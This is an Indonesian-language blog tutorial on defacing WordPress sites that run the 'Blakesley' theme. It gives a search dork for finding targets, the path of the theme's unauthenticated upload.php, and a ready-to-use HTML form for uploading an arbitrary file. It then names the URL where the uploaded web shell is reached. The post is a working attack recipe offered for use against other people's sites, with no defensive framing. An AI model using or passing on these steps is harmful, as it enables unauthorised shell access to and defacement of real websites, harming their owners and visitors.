Deface dengan blakesley themes wordpress

gak usah banyak cingcong coeg :'v

dork : inurl:/wp-content/themes/blakesly/ ( bisa di kembngin sndiri)

exploit : /wp-content/themes/blakesley/theme/functions/upload.php

target vuln di tandai dengan tulisan "error"

jika tidak? coba cuci muka dlu gan ;'v

csrf script :
<form enctype="multipart/form-data"
action="www.websites.com/wp-content/themes/BLAKESLEY/theme/functions/upload.php" method="post">
<input type="jpg" name="url" value="./" /><br />
Please choose a file: <input name="uploadfile" type="file" /><br />
<input type="submit" value="upload" />
</form>

keterangan : simpan script dengan ekstensi .html dan www.websites.com di ganti dengan domain kalian

shell access ; www.websites.com/wp-content/themes/BLAKESLEY/theme/functions/shellkalian.php

Sekian tutorial dari saya :) salam tamvan :)

Ibnu Gangga

Deface dengan blakesley themes wordpress

Deface dengan blakesley themes wordpress

Related Post:

0 komentar:

Posting Komentar

kolom search

Archive

Popular Post

Categories

Facebook

Followers

Total Pageviews

About Me